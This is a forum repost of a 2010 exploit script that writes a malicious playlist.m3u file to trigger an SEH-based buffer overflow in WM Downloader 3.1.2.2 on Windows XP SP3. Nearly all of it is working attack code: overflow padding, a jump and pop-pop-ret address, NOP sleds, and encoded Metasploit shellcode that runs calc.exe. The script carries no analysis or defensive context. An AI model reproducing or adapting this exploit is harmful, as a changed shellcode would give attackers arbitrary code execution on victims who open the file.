[Repost] WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)
Posted: 2010-7-29 11:59
#!/usr/bin/python
# Exploit Title: WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)
# Date: 2010-07-28
# Author: fdisk
# Version: 3.1.2.2 2010.04.15
# Tested on Windows XP SP3 en

payload = "\x41" * 43485
payload += "\xeb\x16\x90\x90" # jump
payload += "\xb4\x15\xbb\x01" # ppr - WDCodec00.dll
payload += "\x90" * 16

# windows/exec - 227 bytes x86/shikata_ga_nai EXITFUNC=thread, CMD=calc.exe
payload += ("\xdb\xdf\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x33\xba\x4c\xa8\x75"
"\x76\x83\xc0\x04\x31\x50\x13\x03\x1c\xbb\x97\x83\x60\x53\xde"
"\x6c\x98\xa4\x81\xe5\x7d\x95\x93\x92\xf6\x84\x23\xd0\x5a\x25"
"\xcf\xb4\x4e\xbe\xbd\x10\x61\x77\x0b\x47\x4c\x88\xbd\x47\x02"
"\x4a\xdf\x3b\x58\x9f\x3f\x05\x93\xd2\x3e\x42\xc9\x1d\x12\x1b"
"\x86\x8c\x83\x28\xda\x0c\xa5\xfe\x51\x2c\xdd\x7b\xa5\xd9\x57"
"\x85\xf5\x72\xe3\xcd\xed\xf9\xab\xed\x0c\x2d\xa8\xd2\x47\x5a"
"\x1b\xa0\x56\x8a\x55\x49\x69\xf2\x3a\x74\x46\xff\x43\xb0\x60"
"\xe0\x31\xca\x93\x9d\x41\x09\xee\x79\xc7\x8c\x48\x09\x7f\x75"
"\x69\xde\xe6\xfe\x65\xab\x6d\x58\x69\x2a\xa1\xd2\x95\xa7\x44"
"\x35\x1c\xf3\x62\x91\x45\xa7\x0b\x80\x23\x06\x33\xd2\x8b\xf7"
"\x91\x98\x39\xe3\xa0\xc2\x57\xf2\x21\x79\x1e\xf4\x39\x82\x30"
"\x9d\x08\x09\xdf\xda\x94\xd8\xa4\x05\x77\xc9\xd0\xad\x2e\x98"
"\x59\xb0\xd0\x76\x9d\xcd\x52\x73\x5d\x2a\x4a\xf6\x58\x76\xcc"
"\xea\x10\xe7\xb9\x0c\x87\x08\xe8\x6e\x46\x9b\x70\x5f\xed\x1b"
"\x12\x9f")

payload += "\x90" * 16

file = open("playlist.m3u", "w")
file.write(payload)
file.close()

print "m3u file generated successfuly"